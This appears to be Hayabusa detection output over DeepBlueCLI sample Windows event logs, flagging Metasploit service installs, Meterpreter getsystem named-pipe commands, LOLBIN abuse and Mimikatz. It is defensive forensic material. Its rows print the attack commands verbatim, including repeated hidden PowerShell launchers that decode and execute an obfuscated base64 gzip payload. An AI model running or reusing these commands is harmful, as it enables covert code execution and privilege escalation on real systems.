Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:23.493 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:33.473 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:00:33.590 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:06:33.654 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:08:05.647 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:08:05.647 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:08:05.647 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:08:05.672 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:08:05.672 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:08:05.672 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:10.677 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:10.677 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:10.677 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:10.682 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:10.682 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:10.682 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:45.349 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:45.349 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:45.349 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:12:45.385 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:45.385 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:12:45.385 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:13:04.090 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:13:04.090 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:13:04.090 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:13:04.094 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:13:04.094 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:13:04.094 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.125 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:23:37.125 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:23:37.125 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 21:23:37.132 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.132 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.132 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.132 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuG